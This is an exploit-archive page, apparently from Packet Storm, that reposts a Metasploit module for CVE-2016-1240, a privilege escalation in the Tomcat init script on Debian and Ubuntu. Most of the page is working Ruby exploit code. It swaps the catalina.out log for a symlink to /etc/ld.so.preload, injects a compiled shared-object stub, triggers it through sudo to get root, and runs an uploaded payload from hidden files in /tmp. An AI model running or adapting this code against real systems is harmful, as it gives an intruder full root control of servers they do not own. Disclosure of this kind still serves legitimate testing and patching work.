exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Apache Tomcat On Ubuntu Log Init Privilege Escalation

Apache Tomcat On Ubuntu Log Init Privilege Escalation
Posted Feb 6, 2023
Authored by h00die, Dawid Golunski | Site metasploit.com

This Metasploit module targets a vulnerability in Tomcat versions 6, 7, and 8 on Debian-based distributions where these older versions provide a vulnerable tomcat init script that allows local attackers who have already gained access to the tomcat account to escalate their privileges from the tomcat user to root and fully compromise the target system.

tags | exploit, local, root
systems | linux, debian
advisories | CVE-2016-1240
SHA-256 | 0ac41921eb75c8008e9f94786db836a9f76e614d54c6925c606eecf1de5fb188

Apache Tomcat On Ubuntu Log Init Privilege Escalation

Change Mirror Download
###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in a command on a linux computer for priv esc.
#
###

class MetasploitModule < Msf::Exploit::Local
Rank = ManualRanking

include Msf::Exploit::Retry
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Post::Linux::Compile
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apache Tomcat on Ubuntu Log Init Privilege Escalation',
'Description' => %q{
Tomcat (6, 7, 8) packages provided by default repositories on Debian-based
distributions (including Debian, Ubuntu etc.) provide a vulnerable
tomcat init script that allows local attackers who have already gained access
to the tomcat account (for example, by exploiting an RCE vulnerability
in a java web application hosted on Tomcat, uploading a webshell etc.) to
escalate their privileges from tomcat user to root and fully compromise the
target system.

Tested against Tomcat 8.0.32-1ubuntu1.1 on Ubuntu 16.04
},
'License' => MSF_LICENSE,
'Author' => [
'h00die', # msf module
'Dawid Golunski <dawid@legalhackers.com>' # original PoC, analysis, discovery
],
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64, ARCH_PYTHON ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'DefaultOptions' => {
'PrependFork' => true,
'WfsDelay' => 1800 # 30min
},
'References' => [
[ 'EDB', '40450' ],
[ 'URL', 'https://ubuntu.com/security/notices/USN-3081-1'],
[ 'URL', 'https://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html'],
[ 'CVE', '2016-1240']
],
'DisclosureDate' => '2016-09-30',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS]
}
)
)
register_options [
OptString.new('CATALINA', [ true, 'Location of catalina.out file', '/var/log/tomcat8/catalina.out' ])
]
register_advanced_options [
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
]
end

def base_dir
datastore['WritableDir'].to_s
end

def preload
'/etc/ld.so.preload'
end

def catalina
datastore['CATALINA']
end

def check
package = cmd_exec('dpkg -l tomcat[6-8] | grep \'^i\'')
if package.nil? || package.empty?
return CheckCode::Safe('Unable to execute command to determine installed pacakges')
end

package = package.gsub('\s+', ' ') # replace whitespace with space so we can split easy
package = package.split(' ')
# 0 is ii for installed
# 1 is tomcat# for package name
# 2 is version number
package = Rex::Version.new(package[2])

if (package.to_s.start_with?('8') && package < Rex::Version.new('8.0.32-1ubuntu1.2')) ||
(package.to_s.start_with?('7') && package < Rex::Version.new('7.0.52-1ubuntu0.7')) ||
(package.to_s.start_with?('6') && package < Rex::Version.new('6.0.35-1ubuntu3.8'))
return CheckCode::Appears("Vulnerable app version detected: #{package}")
end

CheckCode::Safe("Unexploitable tomcat packages found: #{package}")
end

def exploit
# Check if we're already root
if is_root? && !datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
end

unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end

unless file? catalina
fail_with Failure::BadConfig, "#{catalina} not found or still symlinked"
end

if file? preload
fail_with Failure::BadConfig, "#{preload} found, check file as it needs to be removed for exploitation"
end

vprint_status("Creating backup of #{catalina}")
@catalina_content = read_file(catalina)
path = store_loot(
catalina,
'text/plain',
rhost,
@catalina_content,
'catalina.out'
)
print_good("Original #{catalina} backed up to #{path}")

if live_compile?
# upload our privesc stub
so_stub = ".#{rand_text_alphanumeric(5..10)}.so"
so_stub_path = "#{base_dir}/#{so_stub}"
payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"

# Upload exploit stub
vprint_status "Compiling exploit stub: #{so_stub_path}"
upload_and_compile so_stub_path, strip_comments(exploit_data('CVE-2016-1240', 'privesc_preload.c').gsub('$BACKDOORPATH', payload_path)), '-Wall -fPIC -shared -ldl'
else
payload_path = '/tmp/.jMeY5vToQl'
so_stub = '.ny9NyKEPJ.so'
so_stub_path = "/tmp/#{so_stub}"

write_file(so_stub_path, exploit_data('CVE-2016-1240', 'stub.so'))
end
register_file_for_cleanup(so_stub_path)

# Upload payload executable
vprint_status("Uploading Payload to #{payload_path}")
upload_and_chmodx payload_path, generate_payload_exe
register_file_for_cleanup(payload_path)

# delete the log and symlink ld.so.preload
vprint_status("Deleting #{catalina}")
rm_f(catalina)
vprint_status("Creating symlink from #{preload} to #{catalina}")
cmd_exec("ln -s #{preload} #{catalina}")
register_file_for_cleanup(catalina)

# we now need tomcat to restart
print_good("Waiting #{datastore['WfsDelay']} seconds on tomcat to re-open the logs aka a Tomcat service restart")
succeeded = retry_until_truthy(timeout: datastore['WfsDelay']) do
file? preload
end

unless succeeded
print_error("#{preload} not found, exploit aborted")
return
end
register_file_for_cleanup(preload)

# now that we can write to ld.so.preload, use a SUID binary to execute our stub
print_status("injecting #{so_stub_path} into #{preload}")
cmd_exec "echo #{so_stub_path} > #{preload}"
print_status('Escalating payload privileges via SUID binary (sudo)')
cmd_exec 'sudo --help 2>/dev/null >/dev/null'
print_status('Executing payload')
cmd_exec payload_path
end

def cleanup
if @catalina_content.nil?
cmd_exec("touch #{catalina}")
else
write_file(catalina, @catalina_content)
end
super
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close